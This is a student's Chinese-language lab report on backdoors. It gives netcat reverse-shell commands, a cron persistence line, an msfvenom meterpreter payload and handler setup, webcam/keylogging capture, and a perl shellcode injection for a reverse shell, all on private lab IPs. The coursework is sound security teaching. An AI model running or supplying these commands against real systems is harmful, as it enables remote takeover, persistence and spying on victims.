Exp2 后门原理与实践-20201324

发布时间 2023-03-22 21:16:08作者: 20201324徐源

1 实验内容

(1)使用netcat获取主机操作Shell,cron启动

互相Ping通

查看得知linux的IP:192.168.137.142

查看得知windows的IP:192.168.43.213

获得shell

Windows获取Linux Shell

ncat.exe -l -p 1324
nc 192.168.43.213 1324 -e /bin/sh

Linux获取Windows Shell

nc -l -p 1324
ncat.exe -e cmd.exe 192.168.137.142 1324

在Linux下启动cron并在Windows下监听

Linux下启动cron

crontab -e
27 * * * * /bin/netcat 192.168.43.213 01324 -e /bin/sh
crontab -l

windows端监听

windows端在56秒之前回车,时间到56秒后就可以输入指令了

(2)使用socat获取主机操作Shell, 任务计划启动

创建任务,完成命名,设置触发器和操作

我的触发器是按预定时间,到时间后windows主机会运行socat.exe并弹窗

windows主机弹窗后即可在linux端输入指令

发现确实攻击成功

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

出现如下报错,附解决方法:

上述报错比较常见,我的解救方法是解除被占用的端口。此外重启kali应该也可行

在Kali上用MSF meterpreter生成后门可执行程序20201324_backdoor.exe

kali:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.142 LPORT=1324 -f exe > 20201324_backdoor.exe //这里是kali的IP

在Windows上监听1324端口等待接收可执行文件20201324_backdoor.exe

主机:

ncat.exe -lv 1324 >20201324_backdoor.exe

在Kali上将生成的20201324_backdoor.exe传送给Windows

kali :

ncat 192.168.43.213 1324 < 20201324_backdoor.exe //这里是windows的IP

然后就可以看到windows端连接成功,如下图

kali:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.137.142
set LPORT 1324
show options
exploit

然后就获取成功

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

在(3)完成的基础上,不要退出,直接继续

获取目标主机音频、摄像头

获取目标主机击键记录、屏幕截图

(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

先生成shellcode。关闭地址随机化

获取返回地址

将生成的shellcode注入到返回地址之后的位置

我生成的shellcode如本节图1,返回地址为0xffffd330,故构造input_shellcode文件如下

perl -e 'print "A" x 32;print "\x30\xd3\xff\xff\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x89\x8e\x68\x02\x00\x05\x2c\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"' > input_shellcode

再开一个终端,配置msfconsole

成功

2 基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

盗版网站提供的安装包中包含后门,用户下载后,后门即进入其系统。网站中还可能包含钓鱼链接,用户点击后会攻击系统漏洞、获取一定的系统权限并安装后门

(2)例举你知道的后门如何启动起来(win及linux)的方式?

加入Windows启动项;linux的cron启动;将后门程序与一个链接或者是文件绑定在一起等待用户启动

(3)Meterpreter有哪些给你映像深刻的功能?

对获取目标主机摄像头的功能印象最深。父母平时经常会劝我把摄像头遮起来,以前觉得他们不懂电脑大惊小怪,但现在攻击者能在我未授权的情况下直接获取摄像头视野,我感觉很可怕。还有获取音频、击键、屏幕画面的功能,感觉一旦被成功攻击,用户使用计算机将毫无隐私可言

(4)如何发现自己有系统有没有被安装后门?

我上一台计算机曾经被安装过后门(嗯,上一台,懂得都得)。出现的症状有数据突然丢失、文件突然被格式化或消失、计算机自动安装大量流氓软件、频繁卡顿和死机、阻止安装杀毒软件等

3 实验总结与体会

做的非常痛苦!非常痛苦!非常痛苦!

我还是前面慢后面快的作风,加分项一遍过,前半部分做的差点头秃。就问Linux下启动cron卡了四个小时的还有谁。linux配置好后,window端回车后一直无法键入指令。网上搜了一大堆Cron定时任务不执行的资料,把环境啊进程啊网络啊都检查了一遍,给同学截图看了也说没问题。最后发现是windows端必须在指定时间之前回车,到时间后就可以输入命令获取kali端信息了,而我之前是到达指定时间后才回车。后来咨询同学才了解到,回车前的语句就相当于打开这个端口,到时间后cron就会发包。如果不提前回车,端口就不会打开,也就错过收包。

后面使用MSF meterpreter生成可执行文件,利用ncat传送到主机的过程也出现一点小问题。设定LHOST时填写的应该是kali的IP,而kali发送生成的20201324_backdoor.exe传送给Windows时应该填windows的IP。前者是因为要反弹回连Kali,后者是因为要传输给windows必须获知其IP。要理解原理才不至于填乱